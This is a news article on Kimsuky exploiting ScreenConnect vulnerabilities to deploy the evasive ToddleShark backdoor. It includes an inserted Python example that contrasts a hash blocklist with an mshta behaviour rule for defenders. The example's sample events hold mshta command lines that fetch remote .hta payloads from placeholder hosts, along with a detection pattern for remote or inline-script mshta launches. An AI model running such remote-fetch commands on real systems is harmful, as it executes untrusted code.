North Korea Hits ScreenConnect Bugs to Drop ToddleShark Malware

Published: 23/11/2024   Category: security



North Korea's latest espionage tool is tough to pin down, with random generators that throw detection mechanisms off its scent. The DPRK is using the recent critical bugs in ConnectWise ScreenConnect, a remote desktop tool, to deliver the malware.



North Korean hackers are using a critical vulnerability in ConnectWise's ScreenConnect software to spread new, shapeshifting espionage malware.

Two weeks ago, ConnectWise revealed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug given a high score of 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare critical 10 out of 10 authentication bypass bug. With hardly a moment to spare, cyberattackers pounced — most notably, initial access brokers (IABs) in cahoots with ransomware groups — with thousands of organizations in the firing line scrambling to patch.

Kimsuky (aka APT43), the advanced persistent threat (APT) from the Democratic People's Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, it's exploiting vulnerable versions of ScreenConnect to deploy a new backdoor called ToddleShark.
The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing, according to Kroll. Patching ScreenConnect applications is therefore imperative.
ToddleShark builds off of previous Kimsuky malware but stands out for its approach to anti-detection.
In recent espionage campaigns, Kimsuky has deployed various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
"The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," Kroll researchers said in their post, released today.
ToddleShark stands out most, though, for how it uses random generation algorithms to dodge detection. For example, it uses random names for variables and functions to stump static detection, and randomizes its strings and the ordering of code to confuse standard signature-based detection.
Interspersed with its regular malicious code are large chunks of junk code, and hexadecimal encoded code, making the final outcome look like a bit of a mess.
Blocklisting doesn't really work against ToddleShark, either, because the hash of the initial payload and the URLs used to download additional stages of the malware are always different.
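Because the payload hash and download URLs change on every deployment, the durable signal is the behaviour Kroll describes: a legitimate mshta.exe launch fetching content from a remote, never-before-seen URL. The following is an added illustration (not code from Kroll or the article) that runs a hash blocklist and a behaviour rule over constructed process-creation events; the event fields, hashes and URLs are all hypothetical.

```python
import hashlib
import re

# Constructed process-creation events (hypothetical; not indicators from the report).
# Two "variants" differ in payload bytes and C2 URL, mimicking the per-deployment
# randomisation described above; the third is a benign local .hta launch.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/a1b2c3d4e5f6.hta",
     "payload": b"variant one: junk junk junk"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://203.0.113.20/x9y8z7w6.hta",
     "payload": b"variant two: different junk, different hash"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta",
     "payload": b"benign local help file"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\u\notes.txt",
     "payload": b"not mshta at all"},
]

# A hash blocklist built from the first variant only, as a defender would have
# after analysing a single sample.
BLOCKLIST = {hashlib.sha256(SAMPLE_EVENTS[0]["payload"]).hexdigest()}

REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)


def is_suspicious_mshta(event):
    """Behaviour rule: mshta.exe launched with a remote URL or an inline script.
    It does not depend on the payload hash or on a fixed URL."""
    if not event["image"].lower().endswith("\\mshta.exe"):
        return False
    cmd = event["cmdline"]
    return bool(REMOTE_URL.search(cmd) or INLINE_SCRIPT.search(cmd))


def compare_detections(events=SAMPLE_EVENTS, blocklist=BLOCKLIST):
    """Return (hash_blocklist_hits, behaviour_rule_hits) over the events."""
    hash_hits = sum(hashlib.sha256(e["payload"]).hexdigest() in blocklist for e in events)
    behaviour_hits = sum(is_suspicious_mshta(e) for e in events)
    return hash_hits, behaviour_hits


if __name__ == "__main__":
    print(compare_detections())  # (1, 2): the blocklist misses the second variant
```

The blocklist catches only the variant it was built from, while the behaviour rule flags both remote-URL launches and leaves the local .hta alone.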
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they haven't already. A patch and other resources for ConnectWise customers are available on the vendor's website.
A ConnectWise spokesperson laid out the timeline:

"On February 13th, an independent researcher submitted a potential ScreenConnect vulnerability through our voluntary disclosure process," the person says. "Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers."

ConnectWise noted that customers should immediately patch on-prem instances of ScreenConnect.

"At this time, ConnectWise and other cybersecurity firms have seen exploits of the ScreenConnect vulnerability on unpatched on-prem instances," the spokesperson says. "However, cyberattacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities."
